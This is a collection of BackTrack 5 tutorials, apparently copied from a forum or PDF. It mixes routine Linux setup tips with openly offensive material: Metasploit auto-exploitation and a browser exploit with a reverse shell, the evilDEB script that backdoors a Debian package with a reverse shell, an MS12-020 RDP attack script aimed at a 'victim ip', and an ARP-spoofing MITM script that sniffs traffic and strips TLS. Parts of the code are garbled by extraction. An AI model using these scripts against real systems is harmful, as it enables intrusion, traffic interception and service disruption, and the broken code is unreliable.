Backtrack 5 R1&R2 Tutorials

1.
Video player on BackTrack 5 R1 - R2

sudo add-apt-repository ppa:rvm/smplayer
sudo apt-get update
sudo apt-get install smplayer smtube
2.Updating BackTrack 5 R1 [ ONLY FOR R1 ]

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/08/bt5migrate.tar
tar -xvf bt5migrate.tar
cd bt5migrate
python bt5migrate.py
3.db_autopwn [TUTORIAL]
1) First install Ruby
sudo apt-get install ruby libruby rdoc
sudo apt-get install libyaml-ruby
sudo apt-get install libzlib-ruby

sudo apt-get install libopenssl-ruby
sudo apt-get install libdl-ruby
sudo apt-get install libreadline-ruby
sudo apt-get install libiconv-ruby
sudo apt-get install rubygems
2) Install PostgreSQL
sudo apt-get install postgresql postgresql-client postgresql-contrib
sudo apt-get install pgadmin3
3) Set up the password for postgres

sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'your password';
\q
sudo passwd -d postgres
sudo su postgres -c passwd
Now enter the same password that you used previously('your password').
3) need to use the gem command to install ActiveRecord and the PostgreSQL driver for Ruby.
sudo gem1.8 install activerecord
sudo gem1.8 install postgres
IF YOU CAN NOT INSTALL postgres probably you need to install ruby1.8-dev
sudo apt-get install ruby1.8-dev
IF YOU STILL CAN NOT INSTALL POSTGRES, YOU NEED THE libpq-dev
sudo apt-get install libpq-dev
Now rerun
sudo gem1.8 install postgres
4)download the Unix tarball from Framework Website

(http://metasploit.com/framework/download) and extract it to the directory of your choice.
5) Extract it and go to the Framework directory and from there run

su postgres
Enter the password ('your password') you have set before.
6) Now run the metasploit

./msfconsole
load db_postgres
db_create test
db_hosts
at the last command you should not get any error
db_nmap IP ADDRESS TO TEST -p 445
This will load the host and will use the exploits for open port 445
check that you are doing it for the correct ip
db_hosts
DO NOT USE IT TO OTHER IP THAT YOU DO NOT HAVE AUTHORISATION. THIS IS

TO DO A SECURITY TEST ON THE MACHINES YOU ARE AUTHORISED.
start the exploitation
db_autopwn -t -p -e -s -b
to know the meaning of this type

db_autopwn
This will show you the options used in the previous command
if suspenseful it will generate some active sessions
sessions -l
To use an active session do this. Where 'i' is the number of the session.
sessions i
4.EXPLOIT [windows/browser/ms10_042_helpctr_xss_cmd_exec]
Open terminal:
root@bt:~# msfconsole
msf > use windows/browser/ms10_042_helpctr_xss_cmd_exec
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set lhost [your IP]
lhost => [your IP]
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set rport 4444
rport => 4444
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
5. Installing VirtualBox on Backtrack 5 R1 or R2

If you have backtrack installed on HDD or dualboot you can install virtualbox into
Backtrack.. The commands are listed below:
root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/
After this is done, edit /etc/apt/sources.list as shown below and download virtualbox
root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free
>> /etc/apt/sources.list
root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- |
sudo apt-key add root@bt # apt-get update
root@bt # apt-cache search virtualbox
root@bt # apt-get install virtualbox-4.0
6.Updating and cleaning BackTrack 5 R1-R2 [SCRIPT]
DOWNLOAD SCRIPT: http://www.2shared.com/file/9CNvJLRy/bt5up.html
Open and run script in terminal :)
7.How to install LINUX/UNIX/BACKTRACK *.tar.gz tarball files-QUICK TUTORIAL

FOR BEGINNERS
I SEE THE MOST OF PEOPLE DONT NOW HOW EXTRACT AND INSTALL
TAR.GZ,TAR.BZ2,TBZ2,TGZ SO HERE IS QUICK TUTORIAL FOR YOU:
How to install Linux / UNIX *.tar.gz tarball files
How do I install tar.gz files under Linux?
A. tar.gz also known as tarball, an archive format for electronic data and software. Most Linux
tarball contains a source code for software. If you are new to Linux I recommend using aptget, rpm and yum command to install all binary packages.
Tarballs are a group of files in one file. Tarball files have the extension .tar.gz, .tgz or .tar.bz2.
Most open source software use tarballs to distribute programs/source codes.
1: Uncompress tarball
To uncompress them, execute the following command(s) depending on the extension:

root@bt: tar -zxvf file.tar.gz
root@bt: tar- zxf file.tgz
root@bt: tar -jxf file.tar.bz2
root@bt: tar -jxf file.tbz2
Now change directory

root@bt: ls
root@bt: cd path-to-software/
2: Build and install software
Generally you need to type 3 commands as follows for building and compiling software:
root@bt:# ./configure
root@bt:# make
root@bt:# make install
Where,
./configure will configure the software to ensure your system has the necessary
functionality and libraries to successfully compile the package
make will compile all the source files into executable binaries.
Finally, make install will install the binaries and any supporting files into the appropriate
locations.
3: Read INSTALL / README file
Each tarball comes with installation and build instructions. Open INSTALL or README file
for more information:
You can use kate or gedit txt editor for open readme and install file
gedit txt editor is come with Backtrack
kate you can install with this command:
root@bt:~# apt-get install kate
8.Install sslstrip for sniffing on Backtrack

root@bt:~# sslstrip
sslstrip: command not found
FIX: Download SSLStrip from http://www.thoughtcrime.org/software/sslstrip/
Then :
root@bt:~# tar -zxvf sslstrip-0.9.tar.gz
sslstrip-0.9/
sslstrip-0.9/README
sslstrip-0.9/COPYING
sslstrip-0.9/setup.py
sslstrip-0.9/sslstrip/
sslstrip-0.9/sslstrip/StrippingProxy.py
sslstrip-0.9/sslstrip/SSLServerConnection.py
sslstrip-0.9/sslstrip/ServerConnectionFactory.py
sslstrip-0.9/sslstrip/ClientRequest.py
sslstrip-0.9/sslstrip/ServerConnection.py
sslstrip-0.9/sslstrip/CookieCleaner.py
sslstrip-0.9/sslstrip/__init__.py
sslstrip-0.9/sslstrip/DnsCache.py
sslstrip-0.9/sslstrip/URLMonitor.py
sslstrip-0.9/lock.ico
sslstrip-0.9/sslstrip.py
root@bt:~# cd sslstrip-0.9
root@bt:~/sslstrip-0.9# python setup.py install
running install
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/DnsCache.py -> build/lib.linux-i686-2.6/sslstrip

copying sslstrip/CookieCleaner.py -> build/lib.linux-i686-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
running install_lib
creating /usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ServerConnection.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ServerConnectionFactory.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/StrippingProxy.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/SSLServerConnection.py ->
/usr/local/lib/python2.6/dist-packages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/ClientRequest.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/__init__.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/URLMonitor.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/DnsCache.py -> /usr/local/lib/python2.6/distpackages/sslstrip
copying build/lib.linux-i686-2.6/sslstrip/CookieCleaner.py -> /usr/local/lib/python2.6/distpackages/sslstrip
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py to
ServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnectionFactory.py to
ServerConnectionFactory.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/StrippingProxy.py to
StrippingProxy.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/SSLServerConnection.py to
SSLServerConnection.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/ClientRequest.py to
ClientRequest.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/__init__.py to __init__.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/URLMonitor.py to
URLMonitor.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/DnsCache.py to DnsCache.pyc
byte-compiling /usr/local/lib/python2.6/dist-packages/sslstrip/CookieCleaner.py to
CookieCleaner.pyc
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
creating /usr/local/share/sslstrip
copying README -> /usr/local/share/sslstrip
copying COPYING -> /usr/local/share/sslstrip
copying lock.ico -> /usr/local/share/sslstrip
running install_egg_info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up
root@bt:~/sslstrip-0.9# sslstrip
9.Nessus instalation on Backtrack
root@bt:~# apt-get install nessus
root@bt:~# /opt/nessus/sbin/nessus-adduser
Login : your username
Login password : your password
for registration go http://www.nessus.org/register/

type first name,last name,mail,mark Check to receive updates from Tenable and click register
go to mail to see the registering key...
root@bt:~# /opt/nessus/bin/nessus-fetch --register YOUR KEY
root@bt:~# /etc/init.d/nessusd start
with mozilla go to
https://your ip adress:8834
10. Adding New Users in Backtrack 5

Did you happen to know how to add or create new user in BackTrack 5 R1 or R2 and why
you have to do that? The ultimate reason of creating new user with lesser privileges than root
is because of security concern.
With default installation of BackTrack 5 R1 or R2, you will find there is only one user
created in the operating system; root (or SuperUser). It is very dangerous for us to run as root
because root has full privileges in the operating system.
If you logged in as a root, your system is more vulnerable to external attacks. In root account,
ones can manage other users account, administer user data, installing new applications,
configure system services and others. You also can end up with destroying your own
operating system if you messed up with the root account.
So, it is more practical to login as normal user and use sudo when it is necessary.
To create a new user, you can user command (a) adduser or (b) useradd. Both command will
do create new user account in BackTrack 5 R1 (Tested with the Gnome version).
Code:
adduser [options] [--home DIR] [--shell SHELL] [--no-create-home] [--uid ID] [--firstuid ID]
[--lastuid ID] [--ingroup GROUP | --gid ID] [--disabled-password] [--disabled-login] [--gecos
GECOS] [--add_extra_groups] [--encrypt-home] <your username=""></your>
Example:
adduser userOne If you are executing line such as the example above, userOne will be created
as a normal user. For more details, you can type man adduser.
11. Managing User in Backtrack 5

How to login as other user in terminal
Open up your terminal. Then write the code as below:
su - <username></username>
This will change your current login user in the terminal to the <username> account. If you
want to logout from the user, just type in exit.</username>
How to change user password
Type in the terminal passwd. It will prompt you to change the current user password. If you
are the root and would like to change other users password, type in:
passwd - <username>.</username>
Adding a new group in Backtrack
Type in groupadd <groupname></groupname> is sufficient enough.
How to create another root user
I dont know, but if you want to add another user with root privilege, you can just edit the
users group. You may edit the users primary group as root or add group root as the users
secondary group. But as for me, this is a bad practise of security. Why would you want to
have several root users?
usermod -g <primarygroupname> -G
<secondarygroupname><username></username></secondarygroupname></primarygroupna
me>
12. evilDEB-v0.1.sh metasploit script for hack ubuntu
#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilDEB.sh (v0.1 2010-07-30)
# Network interface (check with ifconfig) e.g. eth0

interface=eth0
# Settings *** Dont touch ***
export
ourIP=$(ifconfig $interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}')
export
port=$(shuf -i 2000-65000 -n 1)
export version="0.1"
if [ "$(id -u)" != "0" ]; then echo -e "\e[00;31m[-]\e[00m Not a superuser." 1>&2; cleanup; fi
trap 'cleanup' 2 # Interrupt - "Ctrl + C"

function cleanup() {
echo
echo -e "\e[01;32m[>]\e[00m Cleaning up..."
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall
python"
if [ "$debug" == "false" ]; then xterm -geometry 75x8+100+0 -T "evilDEB v$version Removing files" -e "rm -rf evilDEB/"; fi
echo -e "\e[01;36m[>]\e[00m Done! (= Have you... g0tmi1k?"
exit 0
}
function help() {
echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com
Usage: bash evilDEB.sh -i [interface] -d [file]
Common options:
-i --- Network interface (check with ifconfig) e.g. eth0
-d --- DEB file to use
"
exit 1
}
echo -e "\e[01;36m[*]\e[00m g0tmilk's evilDEB v$version"

debFile=""
while getopts "d:i:m:dh?" OPTIONS; do

case ${OPTIONS} in
d
) export debFile=$OPTARG;;
) export interface=$OPTARG;;
?|h ) help;;
*
) echo "\e[00;31m[-]\e[00m Unknown option.";; # DEFAULT
esac
done
echo -e "\e[01;32m[>]\e[00m Checking environment..."

if [ -z "$(pgrep python)" ]; then
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Killing 'Programs'" -e "killall
python"
fi
if [ -e "/tmp/evilDEB" ]; then
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf
/tmp/evilDEB/"
fi
mkdir -p /tmp/evilDEB/
cd /tmp/evilDEB/
if [ "$debFile" == "" ]; then

echo -e "\e[01;32m[>]\e[00m Downloading .DEB..."
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Downloading DEB..." -e "apt-get -d
install xbomb"
mv /var/cache/apt/archives/xbomb_2.1a-7_i386.deb ./
debFile="xbomb_2.1a-7_i386.deb"
else
cp $debFile ./
ls
fi
echo -e "\e[01;32m[>]\e[00m Extracting .DEB..."

mkdir -p extracted/{DEBIAN,tmp}
dpkg -x $debFile extracted/
ar p $debFile control.tar.gz | tar zx
cp control extracted/DEBIAN/
echo -e "\e[01;32m[>]\e[00m Creating payload..."

xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating exploit" -e
"/opt/metasploit3/msf3/msfpayload linux/x86/shell_reverse_tcp LHOST=$ourIP
LPORT=$port X > /tmp/evilDEB/extracted/tmp/g0tmi1k"
echo -e "\e[01;32m[>]\e[00m Injecting payload..."
if [ -e "postinst" ]; then
echo -e "\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null 2>&1 &"
>> postinst
else
echo -e "#! /bin/sh\n\nsudo chmod 2755 /tmp/g0tmi1k && nohup /tmp/g0tmi1k >/dev/null
2>&1 &" > postinst
fi
mv postinst extracted/DEBIAN/
echo -e "\e[01;32m[>]\e[00m Creating .DEB file..."

chmod 755 extracted/DEBIAN/postinst
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Creating DEB..." -e "dpkg-deb --build
/tmp/evilDEB/extracted"
mv extracted.deb evilDEB-${debFile##*/}
echo -e "\e[01;32m[>]\e[00m Running web server... (http://$ourIP:8000)"

#xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e
"/etc/init.d/apache2 start"
if [ "$debug" == "false" ]; then
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -rf
/tmp/evilDEB/extracted"
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Removing files" -e "rm -f
/tmp/evilDEB/{changelog,control,postint}"
xterm -geometry 75x8+100+0 -T "evilDEB v$version - Running web server..." -e "python
-m SimpleHTTPServer"&
else
python -m SimpleHTTPServer &
fi
echo -e "\e[01;32m[>]\e[00m Running metasploit..."

/opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp
LHOST=$ourIP LPORT=$port E
cleanup
13. [FIX] Black screen after startx (BT 5 R2)
After googling I found how fix black screen
I found on forum backtrack-linux.org/forums
http://www.backtrack-linux.org/forums/showthread.php?t=48737
insert the DVD-live
in the grub press TAB to edit boot
you well see somthing like this file=/cdrom/preseed/ubuntu.seed boot=casper

initrd=/casper/initrd.gz
add xforcevesa noapic noapci nosplash irqpoll -- after initrd.gz

put the code after "boot=casper" because "intrid=/casper/intrd.gz" wasn't (BT 5r2 gnome x64)
I try and works!!!!

I hope it help you!!!!!!
14. Microsoft Security Bulletin MS12-020 - Critical
Working exploit for MS12-020 RDP flaw found
This security update resolves two privately reported vulnerabilities in the Remote Desktop
Protocol. The more severe of these vulnerabilities could allow remote code execution if an
attacker sends a sequence of specially crafted RDP packets to an affected system.
ruby script you will found on http://blog.binaryninjas.org/?p=58

or here:
just copy and paste and save as ms12-020-POC-attempt.rb
set permissions in properties and run in terminal
example:
root@bt: ruby ms12-020-POC-attempt.rb 192.168.1.123
(ruby ms12-020-POC-attempt.rb victim ip adress)
___________________________________________________________________________
_
#!/usr/bin/env ruby
# ms12-020 PoC attempt

##
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the the chinese PoC.
#
# by Joshua J. Drake (jduck)
#
require 'socket'
def send_tpkt(sd, data)
sd.write(make_tpkt(data))
end
def make_tpkt(data)
[
3, # version
0, # reserved
4 + data.length
].pack('CCn') + data
end
def make_x224(data)
[ data.length ].pack('C') + data
end
def make_rdp(type, flags, data)

[ type, flags, 4 + data.length ].pack('CCv') + data
end
host = ARGV.shift
sd = TCPSocket.new(host, 3389)
pkts1 = []
# craft connection request
rdp = make_rdp(1, 0, [ 0 ].pack('V'))

x224_1 = make_x224([
0xe0, # Connection request
0,
# ??
0,
# SRC-REF
# Class : Class 0
].pack('CnnC') + rdp)
pkts1
# craft connect-initial
x224_2 = make_x224([
0xf0, # Data / Class 0
0x80 # EOT: True / NR: 0
].pack('CC'))
# mcsCi
target_params = ""+
#"\x02\x01\x00"+
# maxChannelIds
"\x02\x01\x22"+ # maxChannelIds
"\x02\x01\x0a"+ # maxUserIds
"\x02\x01\x00"+ # maxTokenIds
"\x02\x01\x01"+ # numPriorities
"\x02\x01\x00"+ # minThroughput
"\x02\x01\x01"+ # maxHeight
"\x02\x02\xff\xff"+
# maxMCSPDUSize
"\x02\x01\x02" # protocolVersion
min_params = ""+
"\x02\x01\x01"+ # maxChannelIds
"\x02\x01\x01"+ # maxUserIds
"\x02\x01\x01"+ # maxTokenIds
"\x02\x02\x04\x20"+
# maxMCSPDUSize
max_params = ""+
"\x02\x02\xff\xff"+
# maxChannelIds
"\x02\x02\xfc\x17"+
# maxUserIds
"\x02\x02\xff\xff"+
# maxTokenIds
"\x02\x02\xff\xff"+
# maxMCSPDUSize
userdata = ""+
# gccCCrq
"\x00\x05\x00\x14"+
"\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63"+"\x61\x81\x1c"+
# clientCoreData
"\x01\xc0"+"\xd8\x00"+ # header (type, len)
"\x04\x00"+"\x08\x00"+ # version
"\x80\x02"+ # desktop width
"\xe0\x01"+ # desktop height
"\x01\xca"+ # color depth
"\x03\xaa"+ # SASSequence
"\x09\x04\x00\x00" + # keyboard layout
"\xce\x0e\x00\x00" + # client build number
# client name
"\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x04\x00\x00\x00"+ # keyboard type
"\x00\x00\x00\x00"+ # kbd subType
"\x0c\x00\x00\x00"+ # kbd FuncKey
# imeFileName
"\x01\xca"+ # postBeta2ColorDepth
"\x01\x00"+ # clientProductId
"\x00\x00\x00\x00" + # serialNumber
"\x10\x00"+ # highColorDepth
"\x07\x00"+ # supportedColorDepths
"\x01\x00"+ # earlyCapabilityFlags
# clientDigProductId -poc has: "00000-000-0000000-00000"
"\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"+
"\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00"+
"\x00"+ # connectionType
"\x00"+ # pad1octet
"\x00\x00\x00\x00"+ # serverSelectedProtocol
"\x04\xc0\x0c\x00"+ # desktopPhysicalWidth
"\x0d\x00\x00\x00"+ # desktopPhysicalHeight
"\x00\x00\x00\x00"+ # reserved
# clientSecurityData
"\x02\xc0"+"\x0c\x00"+ # header (type, len)
"\x1b\x00\x00\x00"+ # encryptionMethods
"\x00\x00\x00\x00"+ # extEncryptionMethods
# clientNetworkData
"\x03\xc0"+"\x2c\x00"+ # header (type, len)
"\x03\x00\x00\x00"+ # channel count!
# channel 0
"rdpdr\x00\x00\x00"+ # name
"\x00\x00\x80\x80"+ # options
# channel 1
"cliprdr\x00"+
# name
"\x00\x00\xa0\xc0"+ # options
# channel 2
"rdpsnd\x00\x00"+
# name
"\x00\x00\x00\xc0" # options
# clientClusterData (not present)
# clientMonitorData (not present)
mcs_data = ""+
"\x04\x01\x01"+ # callingDomainSelector
"\x04\x01\x01"+ # calledDomainSelector
"\x01\x01\xff"+ # upwardFlag
"\x30" + [ target_params.length ].pack('C') + target_params +
"\x30" + [ min_params.length ].pack('C') + min_params +
"\x30" + [ max_params.length ].pack('C') + max_params +
# userData
"\x04\x82" + [ userdata.length ].pack('n') + userdata
mcs = "\x7f\x65\x82" + [ mcs_data.length ].pack('n') # connect-initial (0x65 / 101), length

mcs
pkts1
# send a special one?

#pkts1
# send more pkts! - based on poc
8.times {
pkts1
}
#pkts1
#pkts1
#pkts1
#pkts1
#pkts1
pkts1
#pkts1
#pkts1
#pkts1
pkts1
bigpkt = pkts1.join('')
20.times { |x|
puts "[*] Sending #{x + 1} ..."
sd.write(bigpkt)
send_tpkt(sd, x224_2 + "\x2e\x00\x00\x01")

#send_tpkt(sd, x224_2 + "\x2e\x00\x00\x02")
# read connect-initial response

buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
}
sd.close
15. ghost-phisher-1.3
1. Update Algorithm
2. Penetration (Metasploit Binding)
3. Support for cloning HTTPS
4. Smarter Algorithm for HTTP Servers
5. Smarter HTML parsing
6. DHCP restructure and verbosity
7. Resolution adjustment for Netbook Users (F3 button)
8. User interface adjustments
9. Automatic redirections after payload download
10.Custom payload and generic vulnerability page supports
Requirements:
python
python-qt4
dhcp3-server
xterm
subversion
To install simply run the following command in terminal after changing directory to the path
were the downloaded package is:
root@host:~# dpkg -i ghost-phisher_1.3_all.deb
Icons and Running the application:
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Ghost Phisher.desktop"
To get the source code for this project from SVN, here's the checkout link:
root@host:~# svn checkout http://ghost-phisher.googlecode.com/svn/Ghost-Phisher
Ghost Phisher Penetration Screenshots
Ghost phisher ships in with default Windows and Linux vulnerability pages, These pages can
be used for penetration.Ghost automatically recognizes the remote operating system and
displays the vulnerability pages according to the information fetched.
16. Change mac adress in Backtrack
In terminal type:
root@bt: ifconfig -a
You will now see a list of network interfaces, chipset details and their mac addresses. Pick
the ID which corresponds to your network card you want to spoof the MAC address on. In
this example I will be use eth0
First we need to bring our interface down. To do this we type the following command into the
shell:
root@bt: ifconfig eth0 down
To change your MAC address type the following command into the shell window swapping
out 11:22:33:44:55:66 for the MAC address you want to use:
root@bt: macchanger mac 11:22:33:44:55:66
Now we need to bring our interface back up. To do this we type the following command into
the shell:
root@bt: ifconfig eth0 up

To verify our newly assigned MAC address we can query the interface again using:
root@bt: ifconfig -a
17. Change ip adress in Backtrack...
In terminal type:ifconfig
now you see your ip adress and interface(wlan or eth)
change ip adress:
ifconfig your interface new ip adress
example: ifconfig wlan0 192.168.202.124
now type:
ifconfig again to get network info
you have new ip adress!!!!!
18. Some useful commands in Backtrack.....
Common apt commands
apt-get install <package> Downloads <package> and all of its dependencies, and installs or
upgrades them.</package></package>
apt-get remove [--purge] <package> Removes <package> and any packages that depend on it.
--purge specifies that packages should be purged.</package></package>
apt-get update Updates packages listings from the repo, should be run at least once a week.
apt-get upgrade Upgrades all currently installed packages with those updates available from
the repo. should be run once a week.
apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or
remove packages to satisfy dependencies.
apt-cache search <pattern> Searches packages and descriptions for
<pattern>.</pattern></pattern>
apt-cache show <package> Shows the full description of <package>.</package></package>
apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships
to other packages.</package></package>
man apt Will give you more info on these commands as well as many that are in less common
usage.
Common dpkg commands

dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for
example.</package.deb>
dpkg -c <package.deb> Lists the contents of <package.deb> a .deb
file.</package.deb></package.deb>
dpkg -I <package.deb> Extracts package information from <package.deb> a .deb
file.</package.deb></package.deb>
dpkg -r <package> Removes an installed package named <package></package></package>
dpkg -P <package> Purges an installed package named <package>. The difference between
remove and purge is that while remove only deletes data and executables, purge also deletes
all configuration files in addition.</package></package>
dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for
checking the contents of a .deb file.</package></package>
dpkg -s <package> Shows information on the installed package <package>. See also aptcache show for viewing package information in the Debian archive and dpkg -I for viewing
package information extracted from a .deb file.</package></package>
dpkg-reconfigure <package> Reconfigures an installed package</package>
man dpkg Will give you more info on these commands as well as many that are in less
common usage.
19. Recording desktop [TUTORIAL]
Open terminal and type:
recordmydesktop --follow-mouse --no-sound --output=/root/backtracklinuxfanpage.ogv
20. Fix for Metasploit update in BackTrack 5 R2
When yo run msfupdate you get this error....
[*] msfupdate[*] Attempting to update the Metasploit Framework...[*]

svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required
by /opt/metasploit/common/lib/libserf-0.so.0)
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required

svn: /opt/metasploit/common/lib/libssl.so.0.9.8: no version information available (required
svn: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required
hears the FIX:
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
Now type again msfupdate and there is no anymore error....
21. Fix Audio control issue on BackTrack 5 R1 or R2
The fix for this is pretty simple.
1. Navigate to System > Preferences > Startup Applications on the main menu.
2. Click on Add.
3. Give a name pulseaudio.
4. For Command, type /usr/bin/pulseaudio
5. Click on Add, and then on Close.
6. Logout to close the X session, and restart it by typing startx
7. After login again go to System-preferences-sound
8. unmute sound
that s all....
22. Automatic MITM shell script.....
#!/bin/bash
#MITM script v2.0 beta

#author Backtrack page
#http://360percents.com/posts/automatic-mitm-shell-script/
#original scripts found on backtrack-linux.org by killadninja and tedbear
IFACES=`ifconfig | grep ' $' | cut -d " " -f1`
echo -n "What interface to use? ie: "$IFACES":"
read -e IFACE
echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
# Setup network
echo "[+] Setting up iptables"
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 1
# Sslstrip
echo "[+] Starting sslstrip"
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/
$SESSION.log &
sleep 2
# urlsnarf
echo "[+] Starting urlsnarf"
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &

sleep 1
# Ettercap
echo
echo "[+] Starting ettercap"
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P
autoadd -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M
arp:remote /"$ROUTER"/ /"$VICTIM"/ &
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
sleep 1
echo
echo "[+] IMPORTANT"
echo "After you have finished please close this script and clean up properly by hitting y" read
WISH
# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up and resetting iptables..."
killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

etterlog -p -i /root/$SESSION/$SESSION.eci
echo "[+] Clean up successful...Bye!"
exit
fi
exit
23. Wicd Error Message on Backtrack 5R1 or R2

WICD Network Manager first time in backtrack 5 R1 or R2
Set up your networking is using the WICD Network Manager, you can find it in the menu:
Menu > Internet > Wicd Network Manager
NOTE: Notice that when starting WICD you will get an error:
Could not connect to wcid s D-Bus interface.Check the wcid log for error messages.
In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD
open up a terminal and type in the following:
root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults
Now after a reboot the error should not occur anymore.
24. Metasploit update and add db_autopwn BT5 r2

You can add db_autopwn in metasploit:
root@bt:~# cd /opt/metasploit/msf3
root@bt:/opt/metasploit/msf3# svn update
At revision 14857
root@bt:/opt/metasploit/msf3#
Now db_autopwn :
Upload the rb file here : http://www.mediafire.com/?9cwwdeaa1jc4t55

Download it and move it into /opt/metasploit/msf3/plugins
Reboot BT5 R2
Then make sure the database is connected , do the following:
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...

the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`.
,-,
` `.
,;' /
`. ,'/ .'
`. X /.'
